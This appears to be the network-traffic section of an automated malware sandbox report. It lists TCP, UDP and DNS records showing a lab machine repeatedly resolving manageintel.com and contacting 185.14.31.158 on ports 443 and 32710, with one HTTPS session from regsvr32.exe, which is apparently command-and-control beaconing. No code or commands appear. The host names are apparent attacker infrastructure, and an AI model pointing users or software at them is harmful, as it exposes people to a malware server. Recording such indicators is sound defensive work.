Jan 30, 2022 13:33:36.738997936 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.739022970 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.742286921 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.757966995 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.758023977 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.758100033 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.758141994 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.758162022 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.758348942 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.758383989 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.758433104 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.758455038 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.758471966 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.758502007 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.770067930 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.770123959 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.770162106 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.770179987 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.770198107 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.770247936 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.770277023 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.770317078 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.770344019 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.770361900 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.770375967 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.770407915 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.770724058 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.770764112 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.770797968 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.770813942 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.770832062 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.770863056 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.771059036 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.771099091 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.771126986 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.771148920 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.771166086 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.771188974 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.782461882 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.782501936 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.782551050 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.782568932 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.782596111 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.782648087 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.795584917 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.795623064 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.795679092 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.795696020 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.795747995 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.795762062 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.795944929 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.795983076 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.796022892 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.796039104 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.796053886 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.796097994 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.796320915 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.796372890 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.796412945 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.796428919 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.796444893 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.796483040 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.796708107 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.796744108 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.796782017 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.796797037 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.796818972 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.796847105 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.806432009 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.806483030 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.806524992 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.806543112 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.806567907 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.806586981 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.806977034 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.807018042 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.807090998 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.807111025 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.807178974 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.821413040 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.821454048 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.821593046 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.821610928 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.821650028 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.821657896 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.821794033 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.821835041 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.821871042 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.821894884 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.821911097 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.821938992 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.822220087 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.822257996 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.822293997 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.822326899 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:37.029886007 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:37.029983997 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:37.237895012 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:37.243109941 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:37.669888020 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:37.669971943 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:38.501880884 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:38.501938105 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:39.829277992 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:39.829317093 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:39.829341888 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:39.829478979 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:39.829495907 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:39.829515934 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:39.829610109 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:39.829623938 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:39.829679966 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:39.829751968 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:46.434705973 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:56.898474932 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:56.898525000 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:57.344065905 CET	49843	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:57.368030071 CET	32710	49843	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:57.368386984 CET	49843	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:57.379771948 CET	49843	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:57.446387053 CET	32710	49843	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:57.634951115 CET	32710	49843	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:57.635226965 CET	32710	49843	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:57.635417938 CET	49843	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:57.646553040 CET	49843	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:57.670391083 CET	32710	49843	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:57.680079937 CET	49844	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:57.703756094 CET	32710	49844	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:57.703938007 CET	49844	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:57.704222918 CET	49844	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:57.770370960 CET	32710	49844	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:57.951225996 CET	32710	49844	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:57.951392889 CET	49844	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:57.951442003 CET	49844	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:57.974889040 CET	32710	49844	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:58.100112915 CET	49845	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:58.124003887 CET	32710	49845	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:58.124161959 CET	49845	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:58.124320984 CET	49845	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:58.196116924 CET	32710	49845	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:58.373992920 CET	32710	49845	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:58.374028921 CET	32710	49845	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:58.374174118 CET	49845	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:58.374861002 CET	49845	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:58.398305893 CET	32710	49845	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:58.555911064 CET	49846	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:58.579634905 CET	32710	49846	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:58.579864979 CET	49846	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:58.580157042 CET	49846	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:58.646454096 CET	32710	49846	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:58.817459106 CET	32710	49846	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:58.817599058 CET	49846	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:58.817639112 CET	49846	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:58.841445923 CET	32710	49846	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:59.264086008 CET	49847	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:59.287666082 CET	32710	49847	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:59.287846088 CET	49847	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:59.288182974 CET	49847	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:59.354365110 CET	32710	49847	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:59.512347937 CET	32710	49847	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:59.512392998 CET	32710	49847	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:59.512518883 CET	49847	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:59.513138056 CET	49847	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:59.536941051 CET	32710	49847	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:59.780441999 CET	49848	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:59.804016113 CET	32710	49848	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:59.804223061 CET	49848	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:59.804485083 CET	49848	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:59.870321989 CET	32710	49848	185.14.31.158	192.168.2.3
Jan 30, 2022 13:34:00.021991014 CET	32710	49848	185.14.31.158	192.168.2.3
Jan 30, 2022 13:34:00.022224903 CET	32710	49848	185.14.31.158	192.168.2.3
Jan 30, 2022 13:34:00.022403955 CET	49848	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:34:00.022484064 CET	49848	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:34:00.046013117 CET	32710	49848	185.14.31.158	192.168.2.3
Jan 30, 2022 13:34:00.178761959 CET	49849	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:34:00.202195883 CET	32710	49849	185.14.31.158	192.168.2.3
Jan 30, 2022 13:34:00.202306986 CET	49849	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:34:00.202415943 CET	49849	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:34:00.266427040 CET	32710	49849	185.14.31.158	192.168.2.3
Jan 30, 2022 13:34:00.459328890 CET	32710	49849	185.14.31.158	192.168.2.3
Jan 30, 2022 13:34:00.459364891 CET	32710	49849	185.14.31.158	192.168.2.3
Jan 30, 2022 13:34:00.459558964 CET	49849	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:34:00.459594965 CET	49849	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:34:00.483597040 CET	32710	49849	185.14.31.158	192.168.2.3
Jan 30, 2022 13:34:00.631620884 CET	49850	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:34:00.657808065 CET	32710	49850	185.14.31.158	192.168.2.3
Jan 30, 2022 13:34:00.657926083 CET	49850	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:34:00.658077002 CET	49850	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:34:00.726314068 CET	32710	49850	185.14.31.158	192.168.2.3
Jan 30, 2022 13:34:00.914897919 CET	32710	49850	185.14.31.158	192.168.2.3
Jan 30, 2022 13:34:00.915029049 CET	49850	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:34:00.915093899 CET	49850	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:34:00.938668966 CET	32710	49850	185.14.31.158	192.168.2.3
Jan 30, 2022 13:34:01.070036888 CET	49851	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:34:01.097937107 CET	32710	49851	185.14.31.158	192.168.2.3
Jan 30, 2022 13:34:01.098033905 CET	49851	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:34:01.098141909 CET	49851	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:34:01.162317991 CET	32710	49851	185.14.31.158	192.168.2.3
Jan 30, 2022 13:34:01.365734100 CET	32710	49851	185.14.31.158	192.168.2.3
Jan 30, 2022 13:34:01.365839958 CET	49851	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:34:01.365942955 CET	32710	49851	185.14.31.158	192.168.2.3
Jan 30, 2022 13:34:01.366000891 CET	49851	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:34:01.401371956 CET	32710	49851	185.14.31.158	192.168.2.3
Jan 30, 2022 13:34:01.624083042 CET	49852	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:34:01.647732973 CET	32710	49852	185.14.31.158	192.168.2.3
Jan 30, 2022 13:34:01.647836924 CET	49852	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:34:01.648149967 CET	49852	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:34:01.714477062 CET	32710	49852	185.14.31.158	192.168.2.3
Jan 30, 2022 13:34:01.879401922 CET	32710	49852	185.14.31.158	192.168.2.3
Jan 30, 2022 13:34:01.879442930 CET	32710	49852	185.14.31.158	192.168.2.3
Jan 30, 2022 13:34:01.879585028 CET	49852	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:34:01.879640102 CET	49852	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:34:01.903325081 CET	32710	49852	185.14.31.158	192.168.2.3
Jan 30, 2022 13:34:02.053777933 CET	49853	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:34:02.077593088 CET	32710	49853	185.14.31.158	192.168.2.3
Jan 30, 2022 13:34:02.077868938 CET	49853	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:34:02.077996969 CET	49853	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:34:02.143173933 CET	32710	49853	185.14.31.158	192.168.2.3
Jan 30, 2022 13:34:02.345707893 CET	32710	49853	185.14.31.158	192.168.2.3
Jan 30, 2022 13:34:02.345748901 CET	32710	49853	185.14.31.158	192.168.2.3
Jan 30, 2022 13:34:02.345968962 CET	49853	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:34:02.346026897 CET	49853	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:34:02.372656107 CET	32710	49853	185.14.31.158	192.168.2.3
Jan 30, 2022 13:34:02.504776955 CET	49854	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:34:02.528389931 CET	32710	49854	185.14.31.158	192.168.2.3
Jan 30, 2022 13:34:02.528640032 CET	49854	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:34:02.528935909 CET	49854	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:34:02.594295025 CET	32710	49854	185.14.31.158	192.168.2.3
Jan 30, 2022 13:34:02.774950981 CET	32710	49854	185.14.31.158	192.168.2.3
Jan 30, 2022 13:34:02.775115013 CET	49854	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:34:02.775161982 CET	49854	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:34:02.798820019 CET	32710	49854	185.14.31.158	192.168.2.3
Jan 30, 2022 13:34:02.908405066 CET	49855	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:34:02.932440042 CET	32710	49855	185.14.31.158	192.168.2.3
Jan 30, 2022 13:34:02.932600021 CET	49855	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:34:02.932660103 CET	49855	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:34:02.998549938 CET	32710	49855	185.14.31.158	192.168.2.3
Jan 30, 2022 13:34:03.160350084 CET	32710	49855	185.14.31.158	192.168.2.3
Jan 30, 2022 13:34:03.160394907 CET	32710	49855	185.14.31.158	192.168.2.3
Jan 30, 2022 13:34:03.160592079 CET	49855	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:34:03.160628080 CET	49855	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:34:03.184103966 CET	32710	49855	185.14.31.158	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 30, 2022 13:30:33.857294083 CET	56009	53	192.168.2.3	8.8.8.8
Jan 30, 2022 13:30:33.965790987 CET	53	56009	8.8.8.8	192.168.2.3
Jan 30, 2022 13:30:45.993905067 CET	59026	53	192.168.2.3	8.8.8.8
Jan 30, 2022 13:30:46.100111008 CET	53	59026	8.8.8.8	192.168.2.3
Jan 30, 2022 13:33:35.122937918 CET	63456	53	192.168.2.3	8.8.8.8
Jan 30, 2022 13:33:35.141964912 CET	53	63456	8.8.8.8	192.168.2.3
Jan 30, 2022 13:33:57.296422958 CET	55108	53	192.168.2.3	8.8.8.8
Jan 30, 2022 13:33:57.315294981 CET	53	55108	8.8.8.8	192.168.2.3
Jan 30, 2022 13:33:57.659612894 CET	58942	53	192.168.2.3	8.8.8.8
Jan 30, 2022 13:33:57.678364038 CET	53	58942	8.8.8.8	192.168.2.3
Jan 30, 2022 13:33:58.082448006 CET	64432	53	192.168.2.3	8.8.8.8
Jan 30, 2022 13:33:58.099420071 CET	53	64432	8.8.8.8	192.168.2.3
Jan 30, 2022 13:33:58.536200047 CET	49250	53	192.168.2.3	8.8.8.8
Jan 30, 2022 13:33:58.554920912 CET	53	49250	8.8.8.8	192.168.2.3
Jan 30, 2022 13:33:58.946538925 CET	63490	53	192.168.2.3	8.8.8.8
Jan 30, 2022 13:33:59.262975931 CET	53	63490	8.8.8.8	192.168.2.3
Jan 30, 2022 13:33:59.672009945 CET	65110	53	192.168.2.3	8.8.8.8
Jan 30, 2022 13:33:59.778824091 CET	53	65110	8.8.8.8	192.168.2.3
Jan 30, 2022 13:34:00.161225080 CET	61120	53	192.168.2.3	8.8.8.8
Jan 30, 2022 13:34:00.178107023 CET	53	61120	8.8.8.8	192.168.2.3
Jan 30, 2022 13:34:00.611428022 CET	53079	53	192.168.2.3	8.8.8.8
Jan 30, 2022 13:34:00.630093098 CET	53	53079	8.8.8.8	192.168.2.3
Jan 30, 2022 13:34:01.050307035 CET	50824	53	192.168.2.3	8.8.8.8
Jan 30, 2022 13:34:01.069185972 CET	53	50824	8.8.8.8	192.168.2.3
Jan 30, 2022 13:34:01.506730080 CET	56706	53	192.168.2.3	8.8.8.8
Jan 30, 2022 13:34:01.621577024 CET	53	56706	8.8.8.8	192.168.2.3
Jan 30, 2022 13:34:02.034220934 CET	53569	53	192.168.2.3	8.8.8.8
Jan 30, 2022 13:34:02.052918911 CET	53	53569	8.8.8.8	192.168.2.3
Jan 30, 2022 13:34:02.486901045 CET	62855	53	192.168.2.3	8.8.8.8
Jan 30, 2022 13:34:02.503182888 CET	53	62855	8.8.8.8	192.168.2.3
Jan 30, 2022 13:34:02.890970945 CET	51046	53	192.168.2.3	8.8.8.8
Jan 30, 2022 13:34:02.907778978 CET	53	51046	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 30, 2022 13:30:33.857294083 CET	192.168.2.3	8.8.8.8	0x7cc0	Standard query (0)	manageintel.com	A (IP address)	IN (0x0001)
Jan 30, 2022 13:30:45.993905067 CET	192.168.2.3	8.8.8.8	0x597a	Standard query (0)	manageintel.com	A (IP address)	IN (0x0001)
Jan 30, 2022 13:33:35.122937918 CET	192.168.2.3	8.8.8.8	0x5c78	Standard query (0)	manageintel.com	A (IP address)	IN (0x0001)
Jan 30, 2022 13:33:57.296422958 CET	192.168.2.3	8.8.8.8	0x70a3	Standard query (0)	manageintel.com	A (IP address)	IN (0x0001)
Jan 30, 2022 13:33:57.659612894 CET	192.168.2.3	8.8.8.8	0x655b	Standard query (0)	manageintel.com	A (IP address)	IN (0x0001)
Jan 30, 2022 13:33:58.082448006 CET	192.168.2.3	8.8.8.8	0xd024	Standard query (0)	manageintel.com	A (IP address)	IN (0x0001)
Jan 30, 2022 13:33:58.536200047 CET	192.168.2.3	8.8.8.8	0xbad9	Standard query (0)	manageintel.com	A (IP address)	IN (0x0001)
Jan 30, 2022 13:33:58.946538925 CET	192.168.2.3	8.8.8.8	0xf53c	Standard query (0)	manageintel.com	A (IP address)	IN (0x0001)
Jan 30, 2022 13:33:59.672009945 CET	192.168.2.3	8.8.8.8	0xc2b5	Standard query (0)	manageintel.com	A (IP address)	IN (0x0001)
Jan 30, 2022 13:34:00.161225080 CET	192.168.2.3	8.8.8.8	0x4948	Standard query (0)	manageintel.com	A (IP address)	IN (0x0001)
Jan 30, 2022 13:34:00.611428022 CET	192.168.2.3	8.8.8.8	0x667e	Standard query (0)	manageintel.com	A (IP address)	IN (0x0001)
Jan 30, 2022 13:34:01.050307035 CET	192.168.2.3	8.8.8.8	0x68a3	Standard query (0)	manageintel.com	A (IP address)	IN (0x0001)
Jan 30, 2022 13:34:01.506730080 CET	192.168.2.3	8.8.8.8	0xebcc	Standard query (0)	manageintel.com	A (IP address)	IN (0x0001)
Jan 30, 2022 13:34:02.034220934 CET	192.168.2.3	8.8.8.8	0xbd6	Standard query (0)	manageintel.com	A (IP address)	IN (0x0001)
Jan 30, 2022 13:34:02.486901045 CET	192.168.2.3	8.8.8.8	0x4708	Standard query (0)	manageintel.com	A (IP address)	IN (0x0001)
Jan 30, 2022 13:34:02.890970945 CET	192.168.2.3	8.8.8.8	0xb9ac	Standard query (0)	manageintel.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Jan 30, 2022 13:30:33.965790987 CET	8.8.8.8	192.168.2.3	0x7cc0	No error (0)	manageintel.com	185.14.31.158	A (IP address)	IN (0x0001)
Jan 30, 2022 13:30:46.100111008 CET	8.8.8.8	192.168.2.3	0x597a	No error (0)	manageintel.com	185.14.31.158	A (IP address)	IN (0x0001)
Jan 30, 2022 13:33:35.141964912 CET	8.8.8.8	192.168.2.3	0x5c78	No error (0)	manageintel.com	185.14.31.158	A (IP address)	IN (0x0001)
Jan 30, 2022 13:33:57.315294981 CET	8.8.8.8	192.168.2.3	0x70a3	No error (0)	manageintel.com	185.14.31.158	A (IP address)	IN (0x0001)
Jan 30, 2022 13:33:57.678364038 CET	8.8.8.8	192.168.2.3	0x655b	No error (0)	manageintel.com	185.14.31.158	A (IP address)	IN (0x0001)
Jan 30, 2022 13:33:58.099420071 CET	8.8.8.8	192.168.2.3	0xd024	No error (0)	manageintel.com	185.14.31.158	A (IP address)	IN (0x0001)
Jan 30, 2022 13:33:58.554920912 CET	8.8.8.8	192.168.2.3	0xbad9	No error (0)	manageintel.com	185.14.31.158	A (IP address)	IN (0x0001)
Jan 30, 2022 13:33:59.262975931 CET	8.8.8.8	192.168.2.3	0xf53c	No error (0)	manageintel.com	185.14.31.158	A (IP address)	IN (0x0001)
Jan 30, 2022 13:33:59.778824091 CET	8.8.8.8	192.168.2.3	0xc2b5	No error (0)	manageintel.com	185.14.31.158	A (IP address)	IN (0x0001)
Jan 30, 2022 13:34:00.178107023 CET	8.8.8.8	192.168.2.3	0x4948	No error (0)	manageintel.com	185.14.31.158	A (IP address)	IN (0x0001)
Jan 30, 2022 13:34:00.630093098 CET	8.8.8.8	192.168.2.3	0x667e	No error (0)	manageintel.com	185.14.31.158	A (IP address)	IN (0x0001)
Jan 30, 2022 13:34:01.069185972 CET	8.8.8.8	192.168.2.3	0x68a3	No error (0)	manageintel.com	185.14.31.158	A (IP address)	IN (0x0001)
Jan 30, 2022 13:34:01.621577024 CET	8.8.8.8	192.168.2.3	0xebcc	No error (0)	manageintel.com	185.14.31.158	A (IP address)	IN (0x0001)
Jan 30, 2022 13:34:02.052918911 CET	8.8.8.8	192.168.2.3	0xbd6	No error (0)	manageintel.com	185.14.31.158	A (IP address)	IN (0x0001)
Jan 30, 2022 13:34:02.503182888 CET	8.8.8.8	192.168.2.3	0x4708	No error (0)	manageintel.com	185.14.31.158	A (IP address)	IN (0x0001)
Jan 30, 2022 13:34:02.907778978 CET	8.8.8.8	192.168.2.3	0xb9ac	No error (0)	manageintel.com	185.14.31.158	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

manageintel.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49759	185.14.31.158	443	C:\Windows\SysWOW64\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
